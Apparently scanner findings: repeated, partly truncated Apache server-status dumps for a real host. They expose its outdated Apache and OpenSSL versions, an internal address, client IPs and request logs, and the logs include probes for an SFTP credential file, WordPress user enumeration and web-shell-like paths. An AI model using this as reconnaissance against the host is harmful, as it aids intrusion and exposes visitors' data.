Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:29 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 45 seconds Server load: 0.33 0.27 0.15 Total accesses: 863188 - Total Traffic: 13.4 GB CPU Usage: u768.59 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 6 requests currently being processed, 174 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no8yes513060 421293no1yes018010 582938no2yes018020 6113967no0yes018000 794980no1yes018010 9107391no0yes018000 11114344no1yes117000 Sum10013 61740100 ______________________________________________________W_____R__W _W___W__________________________________________________________ ________________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00100.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0528210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.234180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00100.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0626130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.754160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0941230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017200.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1141220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9841290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1041190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8966160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98400.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017240.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.004120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0437140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00060.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932774480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57090.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.761140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.761150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57080.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7611650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61000.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.761150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.751160.04.0043.00 168.143.243.26http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.26http/1.1 1-095220/199/2793_ 21.751110.08.4739.67 168.143.243.26http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.741103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.760140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98410.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9741220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99260.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89121910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.984330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.900750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51400.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.660780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90120.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51500.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.9138140.03.9424.64 127.0.0.1http/1.1 2-01220760/384/3025_ 42.95420.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.974320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.910160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.900150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061622350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98240.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5970ebbf46e
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 06-Jun-2023 23:12:10 UTC Restart Time: Thursday, 18-May-2023 19:26:14 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 19 days 3 hours 45 minutes 55 seconds Server load: 0.12 0.72 0.62 Total accesses: 2319352 - Total Traffic: 35.1 GB CPU Usage: u2119.68 s423.41 cu0 cs0 - .154% CPU load 1.4 requests/sec - 22.2 kB/second - 15.9 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0117098no1yes018001 183137no1yes018001 262197no1yes018001 399841no0yes018000 471869no1yes018010 541619no0yes018000 681531no2yes018002 790808no1yes018010 997814no0yes018000 102194no1yes117010 Sum1008 1179035 ________________________________________________________________ ________________________________________________________________ ________________.................._____________________________W ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01170980/715/8722_ 55.9947530.06.3499.32 96.7.74.198http/1.1trmm.us:443GET /public/mms/20221112_185128_UTC_7516387853_0.png HTTP/1.1 0-01170980/713/8713_ 56.114400.09.6682.34 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=35868460459373 H 0-01170980/727/8725_ 56.034420.05.19103.98 127.0.0.1http/1.1 0-01170980/730/8734_ 56.19100.04.62138.67 139.59.230.191http/1.1trmm.us:80GET / HTTP/1.1 0-01170980/728/8776_ 56.0948150.08.51139.18 96.7.74.175http/1.1crm.sprout.online:443HEAD /login.php HTTP/1.1 0-01170980/750/8788_ 56.075780.012.01105.15 157.90.209.77http/1.1 0-01170980/714/8679_ 56.1333130.07.43115.85 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-01170980/721/8733_ 56.1047820.010.35110.77 96.7.74.198http/1.1trmm.us:443GET /public/mms/20221112_185128_UTC_7516387853_0.png HTTP/1.1 0-01170980/715/8736_ 56.19124090.06.1094.33 108.147.101.24http/1.1trmm.us:443POST /s/ HTTP/1.1 0-01170980/707/8716_ 56.123810.05.7083.96 96.7.74.175http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Medium.otf HTTP/1.1 0-01170980/716/8779_ 56.123810.010.72114.81 96.7.74.175http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Light.otf HTTP/1.1 0-01170980/731/8763_ 56.167150.07.74100.85 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/748/8827_ 56.166820.07.3092.23 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/711/8751_ 56.12391530.07.0299.93 96.7.74.175http/1.1crm.sprout.online:443GET / HTTP/1.1 0-01170980/721/8727_ 56.0947220.05.7589.58 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/714/8686_ 55.9944170.06.0494.38 127.0.0.1http/1.1 0-01170980/718/8803_ 56.074140.05.09129.63 157.90.209.77http/1.1 0-01170980/745/8777_ 56.071800.04.5689.91 172.104.102.196http/1.1 1-0831370/334/13825_ 34.77000.01.95184.89 139.59.230.191http/1.1trmm.us:80GET /about HTTP/1.1 1-0831370/335/13885_ 34.75389930.03.18156.00 107.77.195.94http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0831370/329/13906_ 34.7311870.06.60138.30 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/333/13906_ 34.691740.02.60173.57 172.104.102.196http/1.1 1-0831370/321/13928_ 34.749150.03.28178.39 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/341/13811_ 34.76220.02.86169.29 168.143.243.15http/1.1trmm.us:443GET / HTTP/1.1 1-0831370/327/13858_ 34.7212160.06.20185.25 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/337/13815_ 34.76210.04.78176.51 139.59.230.191http/1.1trmm.us:80GET / HTTP/1.1 1-0831370/323/13874_ 34.76200.03.87194.95 172.104.102.196http/1.1trmm.us:443GET / HTTP/1.1 1-0831370/335/13834_ 34.7115800.02.86194.38 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/313/13878_ 34.691820.04.68170.33 172.104.102.196http/1.1 1-0831370/330/13777_ 34.710170.07.27164.32 172.104.102.196http/1.1 1-0831370/322/13849_ 34.749140.06.82196.25 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/336/13957_ 34.683160.06.13193.02 127.0.0.1http/1.1 1-0831370/322/13883_ 34.753160.08.49229.84 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/319/13676_ 34.7113120.06.89228.51 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0831370/318/13867_ 34.6613230.03.72182.72 127.0.0.1http/1.1 1-0831370/324/13920_ 34.710870.03.82188.27 172.104.102.196http/1.1 2-0621970/628/11420_ 135.184870.07.35132.95 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/624/11481_ 134.97217140.06.88146.02 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0621970/613/11443_ 134.61310140.08.13139.91 127.0.0.1http/1.1 2-0621970/624/11428_ 135.00195830.03.27157.92 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/623/11537_ 134.86312170.08.95162.30 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/616/11421_ 135.0316400.03.46154.31 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=35868340415188 H 2-0621970/625/11524_ 134.89291170.05.56138.87 23.192.164.16http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/600/11367_ 134.69275170.07.98164.82 127.0.0.1http/1.1 2-0621970/622/11422_ 134.84337150.04.77143.64 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/611/11476_ 134.99207160.05.01151.31 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/625/11514_ 135.02177130.03.32132.70 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597e15f982e
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 06-Jun-2023 23:12:08 UTC Restart Time: Thursday, 18-May-2023 19:26:14 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 19 days 3 hours 45 minutes 54 seconds Server load: 0.12 0.72 0.62 Total accesses: 2319335 - Total Traffic: 35.1 GB CPU Usage: u2119.62 s423.41 cu0 cs0 - .154% CPU load 1.4 requests/sec - 22.2 kB/second - 15.9 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0117098no1yes018010 183137no1yes018010 262197no1yes018001 399841no0yes018000 471869no1yes117010 541619no0yes018000 681531no1yes018001 790808no1yes018010 997814no0yes018000 102194no1yes018010 Sum1007 1179052 ________________________________________________________________ _________W______________________________________________________ ________________..................______________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01170980/715/8722_ 55.9945530.06.3499.32 96.7.74.198http/1.1trmm.us:443GET /public/mms/20221112_185128_UTC_7516387853_0.png HTTP/1.1 0-01170980/713/8713_ 56.114300.09.6682.34 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=35868460459373 H 0-01170980/727/8725_ 56.034320.05.19103.98 127.0.0.1http/1.1 0-01170980/730/8734_ 56.19000.04.62138.67 139.59.230.191http/1.1trmm.us:80GET / HTTP/1.1 0-01170980/728/8776_ 56.0947150.08.51139.18 96.7.74.175http/1.1crm.sprout.online:443HEAD /login.php HTTP/1.1 0-01170980/750/8788_ 56.074780.012.01105.15 157.90.209.77http/1.1 0-01170980/714/8679_ 56.1332130.07.43115.85 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-01170980/721/8733_ 56.1045820.010.35110.77 96.7.74.198http/1.1trmm.us:443GET /public/mms/20221112_185128_UTC_7516387853_0.png HTTP/1.1 0-01170980/715/8736_ 56.19024090.06.1094.33 108.147.101.24http/1.1trmm.us:443POST /s/ HTTP/1.1 0-01170980/707/8716_ 56.123710.05.7083.96 96.7.74.175http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Medium.otf HTTP/1.1 0-01170980/716/8779_ 56.123710.010.72114.81 96.7.74.175http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Light.otf HTTP/1.1 0-01170980/731/8763_ 56.166150.07.74100.85 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/748/8827_ 56.165820.07.3092.23 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/711/8751_ 56.12381530.07.0299.93 96.7.74.175http/1.1crm.sprout.online:443GET / HTTP/1.1 0-01170980/721/8727_ 56.0946220.05.7589.58 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/714/8686_ 55.9943170.06.0494.38 127.0.0.1http/1.1 0-01170980/718/8803_ 56.073140.05.09129.63 157.90.209.77http/1.1 0-01170980/745/8777_ 56.070800.04.5689.91 172.104.102.196http/1.1 1-0831370/333/13824_ 34.7018170.01.94184.89 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/335/13885_ 34.75289930.03.18156.00 107.77.195.94http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0831370/329/13906_ 34.7310870.06.60138.30 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/333/13906_ 34.6920740.02.60173.57 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/321/13928_ 34.748150.03.28178.39 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/341/13811_ 34.76120.02.86169.29 168.143.243.15http/1.1trmm.us:443GET / HTTP/1.1 1-0831370/327/13858_ 34.7211160.06.20185.25 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/337/13815_ 34.76010.04.78176.51 139.59.230.191http/1.1trmm.us:80GET / HTTP/1.1 1-0831370/323/13874_ 34.76100.03.87194.95 172.104.102.196http/1.1trmm.us:443GET / HTTP/1.1 1-0831370/335/13834_ 34.7113800.02.86194.38 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/313/13878_ 34.690820.04.68170.33 172.104.102.196http/1.1 1-0831370/330/13777_ 34.7116170.07.27164.32 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/322/13849_ 34.748140.06.82196.25 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/336/13957_ 34.682160.06.13193.02 127.0.0.1http/1.1 1-0831370/322/13883_ 34.752160.08.49229.84 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/319/13676_ 34.7112120.06.89228.51 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0831370/318/13867_ 34.6612230.03.72182.72 127.0.0.1http/1.1 1-0831370/324/13920_ 34.7113870.03.82188.27 23.220.96.151http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/628/11420_ 135.183870.07.35132.95 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/624/11481_ 134.97216140.06.88146.02 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0621970/613/11443_ 134.61309140.08.13139.91 127.0.0.1http/1.1 2-0621970/624/11428_ 135.00193830.03.27157.92 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/623/11537_ 134.86310170.08.95162.30 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/616/11421_ 135.0316300.03.46154.31 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=35868340415188 H 2-0621970/625/11524_ 134.89290170.05.56138.87 23.192.164.16http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/600/11367_ 134.69274170.07.98164.82 127.0.0.1http/1.1 2-0621970/622/11422_ 134.84336150.04.77143.64 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/611/11476_ 134.99206160.05.01151.31 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/625/11514_ 135.021
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597ca28525e
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 02-Apr-2023 18:14:18 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 61 days 1 minute 19 seconds Server load: 0.30 0.17 0.27 Total accesses: 9431778 - Total Traffic: 231.4 GB CPU Usage: u1326.35 s204.91 cu0 cs0 - .0291% CPU load 1.79 requests/sec - 46.0 kB/second - 25.7 kB/request 3 requests currently being processed, 177 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0627no0yes018000 180709no1yes018001 273616no3yes018012 415564no1yes018010 549980no8yes018044 659512no0yes018000 760182no3yes117002 854713no5yes117023 9108749no3yes117021 1098335no2yes018020 Sum10026 317701213 ______________________________________________________.......... ........________________________________________________________ _W______________________________R_____W_________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-06270/284/47886_ 36.572500.04.881049.22 127.0.0.1http/1.1 0-06270/294/47789_ 36.7050180.09.791033.94 127.0.0.1http/1.1 0-06270/285/48076_ 36.58151750.07.671147.46 127.0.0.1http/1.1 0-06270/295/47974_ 36.75153170.012.021033.49 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/290/47777_ 36.8011110.06.621091.32 78.128.113.142http/1.1lhsrwdz.com:443GET /wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP 0-06270/305/48158_ 36.59137160.07.101141.03 157.90.181.149http/1.1 0-06270/304/48088_ 36.58155740.09.121060.07 127.0.0.1http/1.1 0-06270/300/47925_ 36.63131210.03.08915.10 127.0.0.1http/1.1 0-06270/294/48151_ 36.8293160.06.171150.31 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/291/47969_ 36.9220140.06.111000.93 206.174.62.240http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/292/47868_ 36.912520.08.981035.16 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-06270/292/47844_ 36.8931170.07.83998.79 72.93.152.110http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/308/48016_ 36.8743150.07.051046.57 69.178.48.170http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/304/47851_ 36.8557750.06.271080.97 165.254.96.10http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/304/48001_ 36.81102740.08.78992.07 165.254.96.15http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/308/48062_ 36.865020.02.241124.43 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-06270/296/48065_ 36.846700.010.281025.11 78.128.113.142http/1.1lhsrwdz.com:80GET /radio.php HTTP/1.1 0-06270/306/47900_ 36.7415510.06.061035.48 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-0807090/703/45416_ 146.5224770.025.851033.33 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/714/45289_ 146.55000.033.461017.73 165.232.76.155http/1.1trmm.us:80GET /.vscode/sftp.json HTTP/1.1 1-0807090/694/45338_ 146.514100.016.20986.04 78.128.113.142http/1.1lhsrwdz.com:80GET /lock360.php?daksldlkdsadas=1 HTTP/1.1 1-0807090/703/45316_ 146.41123140.025.161058.29 104.28.48.229http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 1-0807090/707/45344_ 146.3023100.024.201065.42 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=30234401910172 H 1-0807090/710/45146_ 146.0553790.025.061075.67 174.215.19.190http/1.1 1-0807090/694/45252_ 146.55010.020.651020.04 165.232.76.155http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0807090/698/45048_ 146.4311749170.020.891018.02 104.28.48.229http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0807090/700/45227_ 146.21317200.021.80967.69 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/700/45263_ 146.55000.011.391143.14 165.232.76.155http/1.1localhost:80HELP 1-0807090/687/45389_ 146.4684780.07.881047.28 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/710/45252_ 145.59231160.019.951037.21 127.0.0.1http/1.1 1-0807090/699/45213_ 146.5133720.022.241022.53 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/702/45190_ 146.55000.09.741043.34 165.232.76.155http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 1-0807090/687/45196_ 146.4955117720.024.861070.45 174.215.19.190http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0807090/680/45270_ 146.31223150.028.81943.67 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/696/45265_ 146.332021680.018.901032.63 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/690/45187_ 146.16352730.020.631082.37 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/567/44110_ 106.59941040.05.79945.74 73.8.249.76http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 2-0736160/557/44120_ 106.5019030.013.051001.92 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0736160/557/44275_ 106.6814167280.07.051074.92 72.217.25.166http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0736160/559/43956_ 106.401000.011.721001.68 127.0.0.1http/1.1 2-0736160/552/44183_ 106.71000.014.56945.62 96.7.74.175http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 2-0736160/549/44189_ 106.6359720.014.531012.19 23.77.218.214http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0736160/574/44212_ 106.6182560.011.41982.81 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/554/43909_ 106.6728810.07.41909.02 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/555/44098_ 106.23190700.015.59939.38 127.0.0.1http/1.1 2-0736160/551/43944_ 106.71000.07.22947.17 96.7.74.175http/1.1trmm.us:443GET /login.action HTTP/1.1 2-0736160/548/44180_ 106.16220870.014.951005.45 127.0.0.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597fee3e30e
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 02-Apr-2023 18:14:17 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 61 days 1 minute 18 seconds Server load: 0.30 0.17 0.27 Total accesses: 9431761 - Total Traffic: 231.4 GB CPU Usage: u1326.3 s204.9 cu0 cs0 - .0291% CPU load 1.79 requests/sec - 46.0 kB/second - 25.7 kB/request 6 requests currently being processed, 174 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0627no0yes018000 180709no1yes018001 273616no2yes018002 415564no0yes117000 549980no5yes216014 659512no0yes018000 760182no3yes117002 854713no4yes018013 9108749no1yes117001 1098335no0yes117000 Sum10016 61740213 ______________________________________________________.......... ........R_________________R_______________R_____________________ _W______________________________________W_______________R_______ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-06270/284/47886_ 36.572500.04.881049.22 127.0.0.1http/1.1 0-06270/294/47789_ 36.7050180.09.791033.94 127.0.0.1http/1.1 0-06270/285/48076_ 36.58151750.07.671147.46 127.0.0.1http/1.1 0-06270/295/47974_ 36.75152170.012.021033.49 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 